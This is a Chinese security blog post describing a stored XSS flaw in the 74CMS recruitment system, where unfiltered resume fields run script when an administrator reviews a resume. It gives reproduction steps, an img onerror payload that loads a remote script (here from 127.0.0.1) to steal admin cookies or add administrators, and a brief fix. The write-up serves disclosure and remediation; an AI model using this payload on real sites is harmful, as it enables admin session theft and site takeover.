74CMS对用户输入没有进行有效过滤,导致XSS 漏洞存在。漏洞触发时,可拿到系统管理员COOKIE信息,修改后台设置,增加管理员等。   1、74CMS人才系统对创建简历的各字段没有进行有效过滤,导致存储型XSS漏洞的存在,存在漏洞的字段包括户口所在地、技能特长、工作经历等等。   当系统管理员登陆后台,审核用户提交简历时,漏洞便会触发。利用此漏洞可以盗取管理员的cookie信息登陆后台、或者使用恶意脚本修改后台设置,例如:删除用户提交简历,增加新的管理员等等。       2、从官网:http://www.74cms.com/ 下载最新版源代码,在本地搭建环境进行测试。  1、注册普通用户,在会员中心模块创建新简历,并在技能技能特长部分输入以下内容:   74cms人才系统存储型XSS及修复 – 网站安全 – 自学插图   2、简历创建完毕, 系统管理员登陆后台,查看简历进行审核:   74cms人才系统存储型XSS及修复 – 网站安全 – 自学插图1 3、打开简历,漏洞触发: 74cms人才系统存储型XSS及修复 – 网站安全 – 自学插图2   4、使用Firebug查看源代码: 74cms人才系统存储型XSS及修复 – 网站安全 – 自学插图3   5、修改插入的恶意标签为:   <img src=x onerror=d=document;e=d.createElement('script');e.src='https://127.0.0.1/eXploit.js';d.body.appendChild(e);>   6、管理员审核简历,漏洞触发:   74cms人才系统存储型XSS及修复 – 网站安全 – 自学插图4     成功加载本地脚本,通过修改脚本代码,我们可以对系统后台进行恶意修改,例如:删除简历,增加管理员等等。 修复方案: 对用户创建简历的各个字段进行有效过滤,禁止特殊字符和特殊属性的输入
    上一篇: KesionCMS存储型xss漏洞可打任意用户 - 网站安全

    下一篇: 易酷cms本地包含导致getwebshell(ThinkPHP) - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《74cms人才系统存储型XSS及修复 – 网站安全 – 自学
   

还没有人抢沙发呢~